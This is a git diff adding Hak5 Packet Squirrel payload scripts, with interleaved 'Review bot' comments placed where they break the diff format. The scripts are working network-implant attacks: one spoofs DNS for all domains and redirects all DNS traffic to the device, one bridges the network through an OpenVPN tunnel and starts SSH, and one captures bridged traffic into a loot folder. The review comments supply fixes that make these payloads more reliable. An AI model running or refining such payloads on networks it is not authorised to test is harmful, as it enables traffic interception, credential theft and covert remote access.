diff --git a/payloads/library/README.md b/payloads/library/README.md
new file mode 100644
index 0000000..989f7e0
--- /dev/null
+++ b/payloads/library/README.md
@@ -0,0 +1 @@
+# Hak5 Packet Squirrel Payloads
diff --git a/payloads/library/dnsspoof/payload.sh b/payloads/library/dnsspoof/payload.sh
new file mode 100755
index 0000000..ca88fbe
--- /dev/null
+++ b/payloads/library/dnsspoof/payload.sh
@@ -0,0 +1,29 @@
+#!/bin/bash
+# DNSSpoof payload
+
+
+function setup() {
+ # Show SETUP LED
+ LED SETUP
+
+ # Set the network mode to NAT
+ NETMODE NAT
+ sleep 5
+
+ # Copy the spoofhost file to /tmp/dnsmasq.address
+ cp $(dirname ${BASH_SOURCE[0]})/spoofhost /tmp/dnsmasq.address &> /dev/null
+
+ # Restart dnsmasq with the new configuration
+ /etc/init.d/dnsmasq restart
+}
+
+function run() {
+ # Show ATTACK LED
+ LED ATTACK
+
+ # Redirect all DNS traffic to ourselves
+ iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
+}
+
+setup
+run
diff --git a/payloads/library/dnsspoof/spoofhost b/payloads/library/dnsspoof/spoofhost
new file mode 100644
index 0000000..46362a9
--- /dev/null
+++ b/payloads/library/dnsspoof/spoofhost
@@ -0,0 +1,2 @@
+address=/#/172.16.32.1
+
diff --git a/payloads/library/openvpn/config.ovpn b/payloads/library/openvpn/config.ovpn
new file mode 100644
index 0000000..e69de29
diff --git a/payloads/library/openvpn/payload.sh b/payloads/library/openvpn/payload.sh
new file mode 100755
index 0000000..2e271eb
--- /dev/null
+++ b/payloads/library/openvpn/payload.sh
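Review bot: The copy in setup() throws away both its exit status and its diagnostics (`&> /dev/null`), so when spoofhost is missing, or the unquoted `$(dirname ${BASH_SOURCE[0]})` word-splits on a path with spaces, dnsmasq is restarted with whatever /tmp/dnsmasq.address already held and nothing signals the failure. Quote the expansions and fail visibly, in line with the `DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)` idiom the openvpn payload in this same commit uses: `cp -- "$(dirname "${BASH_SOURCE[0]}")/spoofhost" /tmp/dnsmasq.address || { LED FAIL; exit 1; }`. A comment on run() is also due, since the `iptables -A` rule is appended unconditionally and a second invocation stacks a duplicate rule rather than replacing it.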
@@ -0,0 +1,55 @@
+#!/bin/bash
+# OpenVPN payload
+
+# Set to 1 to allow clients to use the VPN
+FOR_CLIENTS=0
+
+DNS_SERVER="8.8.8.8"
+
+# Cheap hack to set the DNS server
+function setdns() {
+ while true
+ do
+ [[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && {
+ echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf
+ }
+ sleep 5
+ done
+}
+
+function start() {
+ LED SETUP
+
+ DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
+
+ # Update factory default payload
+ cp ${DIR}/payload.sh /root/payloads/switch3/payload.sh
+
+ # Set NETMODE to BRIDGE and wait 3 seconds
+ # to ensure that things can settle
+
+ [[ "$FOR_CLIENTS" == "1" ]] && {
+ /usr/bin/NETMODE VPN
+ } || {
+ /usr/bin/NETMODE BRIDGE
+ }
+ sleep 3
+
+ # Make OpenVPN use the local configuration
+ uci set openvpn.vpn.config="${DIR}/config.ovpn"
+ uci commit
+
+ # Start the OpenVPN server in the background
+ /etc/init.d/openvpn start
+
+ # Start SSH Server
+ /etc/init.d/sshd start &
+
+ # Set DNS server
+ setdns &
+
+ LED ATTACK
+}
+
+# Start the payload
+start &
diff --git a/payloads/library/tcpdump/payload.sh b/payloads/library/tcpdump/payload.sh
new file mode 100755
index 0000000..bc6f130
--- /dev/null
+++ b/payloads/library/tcpdump/payload.sh
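Review bot: The condition in setdns() can never be false: `grep -q` prints nothing, so `$(grep -q ...)` is always the empty string and `[[ ! "" ]]` is always true, which means /tmp/resolv.conf is rewritten every 5 seconds regardless of what it contains. Test the exit status instead, `if ! grep -qF -- "$DNS_SERVER" /tmp/resolv.conf; then`, and replace the non-portable `echo -e` with `printf 'search lan\nnameserver %s\n' "$DNS_SERVER" > /tmp/resolv.conf`. In start() the `[[ ... ]] && { ... } || { ... }` form is not an if/else (ShellCheck SC2015): should `/usr/bin/NETMODE VPN` return non-zero, the BRIDGE branch runs as well, and the same construct appears at the bottom of the tcpdump payload in this commit. The comment `# Set NETMODE to BRIDGE` is stale now that FOR_CLIENTS can select VPN mode, and the unquoted copy should read `cp -- "${DIR}/payload.sh" /root/payloads/switch3/payload.sh` with a note that it silently overwrites the switch3 factory payload.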
@@ -0,0 +1,57 @@
+#!/bin/bash
+# TCPDump payload v1.0
+
+function monitor_space() {
+ while true
+ do
+ [[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
+ kill $1
+ LED G SUCCESS
+ sync
+ break
+ }
+ sleep 5
+ done
+}
+
+function finish() {
+ # Kill TCPDump and sync filesystem
+ kill $1
+ wait $1
+ sync
+
+ # Indicate successful shutdown
+ LED R SUCCESS
+ sleep 1
+
+ # Halt the system
+ LED OFF
+ halt
+}
+
+function run() {
+ # Create loot directory
+ mkdir -p /mnt/loot/tcpdump &> /dev/null
+
+ # Set networking to TRANSPARENT mode and wait five seconds
+ NETMODE TRANSPARENT
+ sleep 5
+
+ # Start tcpdump on the bridge interface
+ tcpdump -i br-lan -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
+ tpid=$!
+
+ # Wait for button to be pressed (disable button LED)
+ NO_LED=true BUTTON
+ finish $tpid
+}
+
+
+# This payload will only run if we have USB storage
+[[ ! -f /mnt/NO_MOUNT ]] && {
+ LED ATTACK
+ run &
+ monitor_space $! &
+} || {
+ LED FAIL
+}
diff --git a/payloads/switch1/payload.sh b/payloads/switch1/payload.sh
new file mode 100755
index 0000000..730b83f
--- /dev/null
+++ b/payloads/switch1/payload.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+
+NETMODE NAT
+LED ATTACK
diff --git a/payloads/switch2/payload.sh b/payloads/switch2/payload.sh
new file mode 100755
index 0000000..730b83f
--- /dev/null
+++ b/payloads/switch2/payload.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+
+NETMODE NAT
+LED ATTACK
diff --git a/payloads/switch3/payload.sh b/payloads/switch3/payload.sh
new file mode 100755
index 0000000..730b83f
--- /dev/null
+++ b/payloads/switch3/payload.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+
+NETMODE NAT
+LED ATTACK
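Review bot: monitor_space is handed the PID of the backgrounded `run` function (`monitor_space $! &`), not tcpdump's, because `tpid` only exists inside run's background subshell; on low disk space `kill $1` therefore terminates run and its `BUTTON` wait while tcpdump keeps writing, and finish() — the only path that does `sync` and `halt` — never executes. Start the watchdog where the real PID is known: drop `monitor_space $! &` from the dispatch block at the bottom, leaving plain `run &`, and after `tpid=$!` in run() add `monitor_space "$tpid" &`. The free-space probe `df | grep /mnt | awk '{print $4}'` yields one value per mount whose path contains `/mnt`, and a multi-word result makes the `-lt` comparison error out; `df /mnt | awk 'NR==2{print $4}'` should pin it to the one filesystem, though the exact busybox df output is worth confirming on the device. Quoting `kill "$1"` / `wait "$1"` and using `if`/`else` rather than `[[ ... ]] && { } || { }` for the NO_MOUNT dispatch would also bring this in line with ShellCheck.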